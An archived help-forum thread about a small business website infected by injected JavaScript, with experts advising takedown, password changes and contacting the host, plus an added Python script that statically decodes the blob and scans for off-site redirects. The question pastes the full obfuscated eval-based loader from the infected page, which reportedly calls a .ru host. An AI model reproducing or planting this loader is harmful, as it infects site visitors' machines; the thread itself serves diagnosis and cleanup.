Solved

A website was hacked? How do I explain it to the client?

Posted on 2012-08-20
886 Views
Last Modified: 2013-11-22
I helped a friend set up a website on a big shared hosting web service.  He contacted me today saying when someone googles his domain, then follows the link, he gets a Google Malware page saying:

Warning - visiting this web site may harm your computer!
Suggestions:
Return to the previous page and pick another result.
Try another search to find what you're looking for.
Or you can continue to http://loumarinc.com/ at your own risk. For detailed information about the problems we found, visit Google's Safe Browsing diagnostic page for this site.

For more information about how to protect yourself from harmful software online, you can visit StopBadware.org.

If you are the owner of this web site, you can request a review of your site using Google's Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

I go to the home page directly and my Microsoft Security Essentials says your machine was just cleaned. Viewing source, I get access denied until I turn off MSE.

Then the view source shows this besides the usual text:

Warning - visiting this web site may harm your computer!
Suggestions:
Return to the previous page and pick another result.
Try another search to find what you're looking for.
Or you can continue to http://loumarinc.com/ at your own risk. For detailed information about the problems we found, visit Google's Safe Browsing diagnostic page for this site.

For more information about how to protect yourself from harmful software online, you can visit StopBadware.org.

<body bgcolor="#C0C0C0" link="#0000FF" vlink="#0000FF" alink="#0000FF" onload="FP_preloadImgs(/*url*/'button8.jpg',/*url*/'button9.jpg',/*url*/'buttonB.jpg',/*url*/'buttonC.jpg',/*url*/'button17.jpg',/*url*/'button18.jpg',/*url*/'button2C.jpg',/*url*/'button2D.jpg',/*url*/'button2F.jpg',/*url*/'button30.jpg',/*url*/'button2.jpg',/*url*/'button3.jpg',/*url*/'button26.jpg',/*url*/'button25.jpg',/*url*/'button28.jpg',/*url*/'button29.jpg')"><!--c3284d--><script>try{n|=Math.round;}catch(zxc){if(020==0x10)e=eval;m=Math;n="1428..1755..1540..1485..1624..1575..1554..1650..448..1650..1414..1800..1624..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..600..574..1845..182..150..448..480..448..480..1652..1455..1596..480..1456..1575..448..915..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..705..448..1740..1456..1575..1610..690..1134..885..182..150..448..480..448..480..1652..1455..1596..480..1512..1665..448..915..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..555..448..1740..1456..1575..1610..690..1134..885..182..150..448..480..448..480..1652..1455..1596..480..1624..1515..1610..1740..448..915..448..1740..1456..1575..1610..690..910..480..588..480..1512..1665..448..675..448..1740..1456..1575..1610..690..1148..480..588..480..1456..1575..826..195..140..480..448..480..448..1575..1428..600..1624..1515..1610..1740..448..930..448..720..574..1845..182..150..448..480..448..480..448..480..448..480..1624..1560..1470..1725..644..1725..1414..1515..1400..480..854..480..1624..1515..1610..1740..826..195..140..480..448..480..448..1875..448..1515..1512..1725..1414..480..1722..195..140..480..448..480..448..480..448..480..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..915..448..1740..1414..1725..1624..480..602..480..1624..1560..1470..1725..644..1155..826..195..140..480..448..480..448..1875..182..150..448..480..448..480..1596..1515..1624..1755..1596..1650..448..600..1624..1560..1470..1725..644..1725..1414..1515..1400..480..588..480.
.1624..1560..1470..1725..644..1665..1540..1515..1106..1770..1414..1710..1078..615..826..195..140..1875..182..150..182..150..1428..1755..1540..1485..1624..1575..1554..1650..448..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..1065..1414..1650..1414..1710..1358..1740..1554..1710..560..1755..1540..1575..1680..615..1722..195..140..480..448..480..448..1770..1358..1710..448..1500..448..915..448..1650..1414..1785..448..1020..1358..1740..1414..600..1638..1650..1470..1800..588..735..672..720..672..615..826..195..140..480..448..480..448..1770..1358..1710..448..1725..448..915..448..1155..1358..1740..1456..690..1386..1515..1470..1620..560..1500..644..1545..1414..1740..1008..1665..1638..1710..1610..600..574..705..714..615..826..195..140..480..448..480..448..1740..1456..1575..1610..690..1610..1515..1414..1500..448..915..448..750..714..780..742..810..770..840..798..720..686..480..602..480..560..1500..644..1545..1414..1740..1078..1665..1540..1740..1456..600..574..480..588..480..672..1800..980..1050..980..1050..980..1050..574..480..602..480..560..1500..644..1545..1414..1740..952..1455..1624..1515..560..615..448..630..448..720..1680..1050..980..1050..980..615..602..480..560..1155..1358..1740..1456..690..1596..1665..1638..1650..1400..600..1610..480..588..480..672..1800..980..1050..980..615..574..885..182..150..448..480..448..480..1624..1560..1470..1725..644..975..448..915..448..780..784..750..770..735..826..195..140..480..448..480..448..1740..1456..1575..1610..690..1078..480..854..480..700..735..728..825..728..840..714..810..728..825..826..195..140..480..448..480..448..1740..1456..1575..1610..690..1134..480..854..480..1624..1560..1470..1725..644..1155..448..705..448..1740..1456..1575..1610..690..910..885..182..150..448..480..448..480..1624..1560..1470..1725..644..1230..448..915..448..1740..1456..1575..1610..690..1078..480..518..480..1624..1560..1470..1725..644..975..826..195..140..480..448..480..448..1740..1456..1575..1610..690..1554..1650..1414..1185..1652..15
15..1596..1155..448..915..448..735..644..720..448..705..448..1740..1456..1575..1610..690..1078..885..182..150..448..480..448..480..1624..1560..1470..1725..644..1650..1414..1800..1624..480..854..480..1540..1515..1680..1740..1148..1455..1540..1500..1554..1635..1092..1755..1526..1470..1414..1710..826..195..140..480..448..480..448..1710..1414..1740..1638..1710..1540..480..1624..1560..1470..1725..826..195..140..1875..182..150..182..150..1428..1755..1540..1485..1624..1575..1554..1650..448..1485..1596..1515..1358..1740..1414..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..600..1596..660..448..1155..1470..1650..616..480..1078..1455..1680..615..1722..195..140..480..448..480..448..1710..1414..1740..1638..1710..1540..480..1078..1455..1624..1560..644..1710..1554..1755..1540..1500..560..600..1078..1455..1680..675..1078..1575..1540..615..448..630..448..1710..644..1650..1414..1800..1624..600..574..480..602..480..1078..1575..1540..615..826..195..140..1875..182..150..182..150..1428..1755..1540..1485..1624..1575..1554..1650..448..1545..1414..1650..1414..1710..1358..1740..1414..1200..1610..1515..1638..1500..1554..1230..1358..1650..1400..1665..1526..1245..1624..1710..1470..1650..1442..600..1638..1650..1470..1800..616..480..1512..1515..1540..1545..1624..1560..616..480..1708..1665..1540..1515..574..1845..182..150..448..480..448..480..1652..1455..1596..480..1596..1455..1540..1500..448..915..448..1650..1414..1785..448..1230..1358..1650..1400..1665..1526..1170..1638..1635..1372..1515..1596..1065..1414..1650..1414..1710..1358..1740..1554..1710..560..1755..1540..1575..1680..615..826..195..140..480..448..480..448..1770..1358..1710..448..1620..1414..1740..1624..1515..1596..1725..448..915..448..510..1372..1755..1358..1800..1554..1695..1414..1710..1470..1695..1666..1605..1442..1530..1498..1500..1694..1515..1540..1830..1554..1725..1610..1695..1512..1800..1428..1695..1358..1815..1652..1680..1596..510..644..1725..1568..1620..1470..1740..560..585..546..615..826..195..140..480
..448..480..448..1770..1358..1710..448..1725..1624..1710..448..915..448..585..546..885..182..150..126..1530..1554..1710..560..1770..1358..1710..448..1575..448..915..448..720..826..480..1470..480..840..480..1512..1515..1540..1545..1624..1560..826..480..1470..480..602..645..448..615..1722..195..140..480..448..480..448..480..448..480..448..1725..1624..1710..448..645..854..480..1512..1515..1624..1740..1414..1710..1610..1365..1386..1710..1414..1455..1624..1515..1148..1455..1540..1500..1554..1635..1092..1755..1526..1470..1414..1710..560..1710..1358..1650..1400..660..448..720..616..480..1512..1515..1624..1740..1414..1710..1610..690..1512..1515..1540..1545..1624..1560..448..675..448..735..574..1395..826..195..140..480..448..480..448..1875..182..150..448..480..448..480..1596..1515..1624..1755..1596..1650..448..1725..1624..1710..448..645..448..585..644..585..448..645..448..1830..1554..1650..1414..885..182..150..1750..195..140..195..140..1725..1414..1740..1022..1650..1624..1515..1596..1770..1358..1620..560..1530..1638..1650..1386..1740..1470..1665..1540..600..574..1845..182..150..448..480..448..480..1624..1710..1694..1845..182..150..448..480..448..480..448..480..448..480..1470..1530..560..1740..1694..1680..1414..1665..1428..480..1470..1530..1596..1455..1526..1515..1218..1455..1610..1005..1596..1515..1358..1740..1414..1500..448..915..854..480..476..1755..1540..1500..1414..1530..1470..1650..1414..1500..476..615..1722..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1770..1358..1710..448..1755..1540..1575..1680..480..854..480..1078..1455..1624..1560..644..1710..1554..1755..1540..1500..560..645..1540..1515..1666..480..952..1455..1624..1515..560..615..658..735..672..720..672..615..826..480..448..480..448..480..448..480..448..480..448..480..448..480..1652..1455..1596..480..1400..1665..1526..1455..1470..1650..1092..1455..1526..1515..448..915..448..1545..1414..1650..1414..1710..1358..1740..1414..1200..1610..1515..1638..1500..1554..1230..1358..1650..1400..1665..15
26..1245..1624..1710..1470..1650..1442..600..1638..1650..1470..1800..616..480..686..810..616..480..546..1710..1638..585..574..885..448..480..448..480..448..480..448..480..448..480..448..480..1470..1530..1596..1635..448..915..448..1500..1554..1485..1638..1635..1414..1650..1624..690..1386..1710..1414..1455..1624..1515..966..1620..1414..1635..1414..1650..1624..600..476..1095..980..1230..910..1155..966..510..574..885..448..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1575..1428..1710..1526..690..1610..1515..1624..975..1624..1740..1596..1575..1372..1755..1624..1515..560..510..1610..1710..1386..510..616..480..476..1560..1624..1740..1568..870..658..705..476..645..1400..1665..1526..1455..1470..1650..1092..1455..1526..1515..602..510..658..1575..1540..690..1386..1545..1470..945..686..795..476..615..826..480..182..150..448..480..448..480..448..480..448..480..448..480..448..480..1470..1530..1596..1635..644..1725..1624..1815..1512..1515..644..1785..1470..1500..1624..1560..448..915..448..510..672..1680..1680..510..826..480..182..150..448..480..448..480..448..480..448..480..448..480..448..480..1470..1530..1596..1635..644..1725..1624..1815..1512..1515..644..1560..1414..1575..1442..1560..1624..480..854..480..476..720..1568..1800..476..885..448..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1575..1428..1710..1526..690..1610..1740..1694..1620..1414..690..1652..1575..1610..1575..1372..1575..1512..1575..1624..1815..448..915..448..510..1456..1575..1400..1500..1414..1650..476..885..448..195..140..480..448..480..448..480..448..480..448..480..448..480..448..1500..1554..1485..1638..1635..1414..1650..1624..690..1372..1665..1400..1815..644..1455..1568..1680..1414..1650..1400..1005..1456..1575..1512..1500..560..1575..1428..1710..1526..615..826..195..140..135..126..135..1470..1530..1596..1455..1526..1515..1218..1455..1610..1005..1596..1515..1358..1740..1414..1500..448..915..448..1740..1596..1755..1414..885..182..150..448..480..448..480..448..480..
448..480..1750..195..140..480..448..480..448..1875..1386..1455..1624..1485..1456..600..1414..615..1722..1575..1428..1710..1358..1635..1414..1305..1358..1725..938..1710..1414..1455..1624..1515..1400..480..854..480..1638..1650..1400..1515..1428..1575..1540..1515..1400..885..1750..195..140..1875..616..480..686..720..672..615..826".split("..");h=2;s="";for(i=0;i-1769!=0;i=1+i){k=i;s+=String["fromCharCode"](n[k]/(i-h*Math.floor(i/h)+016));}if(016-0xb===3)if(window.document)e(""+s);}</script><!--/c3284d-->
 
Is this the malware? How would you think this got into the home page?  From them having an easy-to-guess cPanel password?  The server was hacked from another account?  What can we do about that?
20 Comments
 
LVL 9

Expert Comment

by:Evan Cutler
ID: 38313936
just for silliness...
 http://loumarinc.com/

is the actual link to your friend's site, yes?
0
 

Author Comment

by:BeGentleWithMe-INeedHelp
ID: 38313965
yes.
0
 
LVL 9

Assisted Solution

by:Evan Cutler
Evan Cutler earned 600 total points
ID: 38313982
Well, you need to look at the code from the homepage...
Look in the root folder, make sure there are no redirects in the folder.
Then check the homepage itself.  Is all of the code yours?
Do you recognize all of it?
Has anyone tampered with it?
Are there any files placed in the root folder you don't know?

Then go into cPanel.
Check the root folder location settings.
Make sure no one pushed cPanel to another site.
(usually there's a view site button...press it).

Make sure in cPanel the domain name is correctly set in the DNS settings
(if the domain was purchased elsewhere, check there....)

If all of the above is set right...

It is possible that a word on one of your friend's sites is on the Google "bad word list".  You can use the Google developer tools to check to see if there's any bad juju.  After that, you can email Google and re-submit the site, and ask them to remove the warning.
0
 
LVL 58

Assisted Solution

by:Gary
Gary earned 800 total points
ID: 38313984
First thing to do is take the site down.
If you have a backup of the site then delete everything on it.
The site seems to be a fairly static html site.
A quick check on other sites on the same server seems to be clear - so it's probably just your website - so you need to find out how you got infected.
I'm presuming this is shared hosting - contact your host and let them know about it.
I cannot see how they may have injected the code as there doesn't appear to be any method of posting information directly to the site.
0
 
LVL 9

Assisted Solution

by:Evan Cutler
Evan Cutler earned 600 total points
ID: 38313988
Agree with Gary....make sure you take it down first...
sorry, lots to do for you..
typing faster than thinking.
0
 
LVL 58

Assisted Solution

by:Gary
Gary earned 800 total points
ID: 38313995
If this is a Linux host then check the .htaccess file for anything suspicious
0
 

Author Comment

by:BeGentleWithMe-INeedHelp
ID: 38314004
How did you guys conclude it's infected?

I was googling some of the code:
<script>try{n|=Math.round;}catch(zxc)

and found a site

http://sitecheck.sucuri.net

that confirms it's infected, that the code I suspected is the cause, and lists the pages infected.

Ever hear of them?  Any good?  Other services you use?  They supposedly catch the malware and clean the site!?
0
 
LVL 58

Assisted Solution

by:Gary
Gary earned 800 total points
ID: 38314014
It is a virus/malware trying to infect the visitor's PC.
All your pages are infected and until you can determine that this is only on your site you cannot be sure that the malware is gone - you could upload your site again and 5 mins later you're back in the same situation.
You need to contact your host.
0
 
LVL 9

Assisted Solution

by:Evan Cutler
Evan Cutler earned 600 total points
ID: 38314020
That will depend on your faith in the company...
and making sure they are listed in Better Business Bureau and other official locations (in other words, to make sure they are not fake themselves).
0
 
LVL 9

Expert Comment

by:Evan Cutler
ID: 38314023
Gary's right again...give him the points.

Call the host.
0
 
LVL 58

Expert Comment

by:Gary
ID: 38314042
How did you guys conclude it's infected?

Because it's got encoded JavaScript in the page that is trying to infect my PC.
0
 
LVL 58

Expert Comment

by:Gary
ID: 38314061
I've narrowed it down.
A call is being made to vqyvqoiayrlunfvy.ru/in.cgi?15
0
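The posters above reach their conclusions three ways: Evan says to look for redirects and unknown files in the root folder, Gary says to check .htaccess and then decodes the numeric blob to see where it calls out, and the question itself shows the `<!--c3284d-->` marker wrapped around the injected script. The following is an added example written for this thread (not code from any poster, the hosting company, or Sucuri) that does those checks over a local copy of a site without executing anything. It uses the decoding rule visible in the quoted loader: the k-th number is the character code multiplied by `(k mod 2) + 016`, i.e. 14 or 15, so the blob can be reversed with plain arithmetic instead of `eval`. The sample files, file names and the `.invalid` host names are constructed for the demonstration and are assumptions, not the real destination.

```python
"""Defender-side triage for the kind of injection quoted in this thread.

Added example for this discussion; not code from any poster.  It walks a local
copy of the site, flags <script> blocks carrying the <!--c3284d--> marker (or a
fromCharCode+eval pattern), decodes the numeric blob with arithmetic instead of
running it, and lists .htaccess redirect rules that point off-site.  Sample
files and "...invalid" host names below are constructed placeholders.
"""
import os
import re
import tempfile

MARKER = "<!--c3284d-->"                      # marker seen in the quoted page source
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
BLOB_RE = re.compile(r'n="([0-9.\s]+)"\s*\.split\("\.\."\)')
META_REFRESH_RE = re.compile(r'<meta[^>]+http-equiv=["\']refresh["\'][^>]*>', re.I)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
STRIDE, BASE = 2, 0o16                        # h=2 and the octal 016 from the quoted loader


def decode_blob(blob: str) -> str:
    """Reverse the loader's arithmetic: code = n[k] / ((k mod 2) + 14).

    The first eight numbers of the blob quoted in the question decode to "function".
    """
    parts = [p for p in re.sub(r"\s+", "", blob).split("..") if p]
    return "".join(chr(int(p) // (k % STRIDE + BASE)) for k, p in enumerate(parts))


def encode_blob(text: str) -> str:
    """Inverse of decode_blob; only used here to build the constructed sample."""
    return "..".join(str(ord(c) * (k % STRIDE + BASE)) for k, c in enumerate(text))


def hosts_in(text: str) -> list:
    """Distinct host names referenced by http(s) URLs in a piece of text."""
    return sorted(set(HOST_RE.findall(text)))


def scan_html(text: str) -> list:
    """Flag marked or fromCharCode+eval scripts and meta-refresh redirects."""
    findings = []
    for m in SCRIPT_RE.finditer(text):
        body = m.group(1)
        marked = MARKER in text[max(0, m.start() - len(MARKER)):m.start()]
        if not (marked or ("fromCharCode" in body and "eval" in body)):
            continue
        blob = BLOB_RE.search(body)
        decoded = decode_blob(blob.group(1)) if blob else ""
        findings.append({"kind": "injected-script", "detail": decoded or body[:80],
                         "hosts": hosts_in(decoded)})
    for m in META_REFRESH_RE.finditer(text):
        findings.append({"kind": "meta-refresh", "detail": m.group(0),
                         "hosts": hosts_in(m.group(0))})
    return findings


def scan_htaccess(text: str, own_host: str) -> list:
    """Report Redirect/RewriteRule lines whose target is not the site's own host."""
    findings = []
    for line in text.splitlines():
        if re.match(r"\s*(RewriteRule|RedirectMatch|Redirect)\b", line, re.I):
            foreign = [h for h in hosts_in(line) if h != own_host]
            if foreign:
                findings.append({"kind": "htaccess-redirect", "detail": line.strip(),
                                 "hosts": foreign})
    return findings


def scan_site(root: str, own_host: str) -> list:
    """Walk a local copy of the site and collect findings tagged with relative paths."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                hits = scan_htaccess(text, own_host)
            elif name.lower().endswith((".html", ".htm", ".php", ".js")):
                hits = scan_html(text)
            else:
                continue
            for hit in hits:
                hit["file"] = os.path.relpath(path, root)
            results.extend(hits)
    return results


def build_sample_site() -> str:
    """Write a constructed three-file site into a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="site-triage-")
    payload = "var src='http://injected-host.invalid/in.cgi?15';"   # constructed stand-in
    injected = (MARKER + '<script>n="' + encode_blob(payload)
                + '".split("..");/* decode loop elided in this sample */</script><!--/c3284d-->')
    files = {
        "index.html": "<html><body>Welcome" + injected + "</body></html>",
        "about.html": "<html><body>Clean page, nothing injected.</body></html>",
        ".htaccess": ("RewriteEngine On\n"
                      "RewriteRule ^old$ http://example.com/new [R,L]\n"               # own host
                      "RewriteRule ^(.*)$ http://redirect-host.invalid/$1 [R,L]\n"),   # off-site
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for hit in scan_site(site, own_host="example.com"):
        print(f"{hit['file']}: {hit['kind']} -> {hit['hosts']}  {hit['detail'][:60]}")
```

Run it against a directory you have downloaded over FTP rather than against the live server, and compare the listed hosts with the domains the site is supposed to reference; anything else is a lead for the hosting company's ticket. The `own_host` argument keeps legitimate same-site rewrites out of the report.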
 

Author Comment

by:BeGentleWithMe-INeedHelp
ID: 38314069
I have a ticket in with the hosting company, but want to know what to expect - should the host have caught this sooner? I think the hosting co. is good.  Been using them for years; my site and other clients' sites test clean with that Sucuri service.  Following a Google link, I see this:

Of the 259454 site(s) we tested on this network over the past 90 days, 13199 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

Is 13K (5%) of the sites being infected high for a shared hosting service? Some of those are likely intentional malware, right? A drawback to shared hosting? 1 bad apple spoils the whole bunch?
0
 
LVL 12

Assisted Solution

by:TomRScott
TomRScott earned 400 total points
ID: 38314073
Assuming you are making a valid request for assistance and not trying to spread a trojan by enticing folks to go to a hacked and infected site...

Yes the page is infected.

Your first steps are:

1. Remove or otherwise disable the infected home page for the web site IMMEDIATELY!!!

That is, if you have access to the site anymore.  If the hack was via a compromised password, the password may have been changed.  If your ftp password no longer works, go to Step 2 QUICKLY and return to this step (1).

2. Change the passwords

For CPanel, then for ftp and EVERYTHING else accessible from CPanel INCLUDING any mailboxes, etc.  If your CPanel password was changed by the hacker(s), call your hosting company, you guessed it, IMMEDIATELY, and inform them of the situation requesting their assistance for both Step 1 and Step 2.

3. Post either the original site or a placeholder site

4. Explain the issue in general terms to your friend

The site was hacked.  The password was too simple or otherwise compromised.  If you shared your password with anybody, you need to reconsider HOW you shared the password.  The CPanel password should NOT be shared beyond a VERY select few.  The other passwords were also changed, since they were possibly compromised via CPanel if its password was known by the hackers.  Discuss good practices regarding the creation of passwords and how they should be "documented" in a manner maintaining security.

5. Plan your next moves

Decide if you have an inside problem or a design flaw in your friend's security that leaves their web site or domain open to recurring attacks.  Adjust security as needed.  Repost the site.  You may consider making part of that repost a note regarding the recent hack to the site and an apology for any inconvenience.  If the site involved is a business site, you should work on fixing any image issues resulting from this incident.

 - Tom
0
 
LVL 58

Expert Comment

by:Gary
ID: 38314126
I would also add that yourself/client should check their own PC - as it is very possible the site was infected as a result of ftp password stealing.
0
 
LVL 58

Expert Comment

by:Gary
ID: 38314190
Hostgator are pretty large and respected enough.
If it was an issue on their end I think they would have caught it before you knew anything about it - would be pretty sure that they have Cpanel and everything updated to eliminate any exploits.
So the reason for the infection probably lies with 'you'.
Simple passwords like DOB that a bot can get into your server with.
Use a service like http://www.strongpasswordcreator.com/ to create a strong password (I personally use minimum 20 character passwords).
5% is not an unreasonable figure for that many sites.
0
 
LVL 54

Assisted Solution

by:Scott Fell, EE MVE
Scott Fell,  EE MVE earned 200 total points
ID: 38314287
I know somewhere Jason will call me out on this, but the problem you have is typically from a plug-in you used with WordPress.  Some plug-ins that make it easy for you to use forms, collect user data etc. can leave you open.  Many times the hackers didn't even need to use a password to mess up your site.  It is a plug-in that leaves open a security hole.  Since sites like WordPress/Joomla are open source, the bad guys already know what to look for.

So disable any WordPress plug-ins and disable the ability to allow people to post comments etc.  Then before you put them back, research the plug-ins to see if they have any patches and updates.

Also, a few months ago there was an update released for Plesk that also left open a security hole.   Typically, you would think HostGator upgraded and patched.

You can probably simply restore an older database and all will be good - just temporarily get rid of the plug-ins until you research them.
0
 
LVL 12

Assisted Solution

by:TomRScott
TomRScott earned 400 total points
ID: 38314293
Also regarding the 5%, you mention "1 bad apple spoils the whole bunch?".  That is why hosting services typically invest in "sandboxing", which separates the apples into "bunches of one", minimizing site-to-site infections between sites on the same host or in the same site.  Further, most malware does not work that way anyway.

Most of the infections are introduced by the owners of the sites involved or via a hack directed at the specific site.

Hosted services are often more hardened and usually have 24 hour professionals monitoring the servers involved for a range of possible issues.

Glad to see you replaced the home page.  Hopefully, you have changed the passwords and started working with the hosting company.

Good luck with the rest of your response.

 - Tom
0
 
LVL 58

Accepted Solution

by:Gary
Gary earned 800 total points
ID: 38314360
padas
Don't think it's from a plugin - there are only 4 pages on the site and no form submissions, not even to contact them.
Though a good point to make sure you have updated the scripts.

As an aside
I would remove the link to the Company Email....
0
 

Author Comment

by:BeGentleWithMe-INeedHelp
ID: 38324461
thanks everyone
0
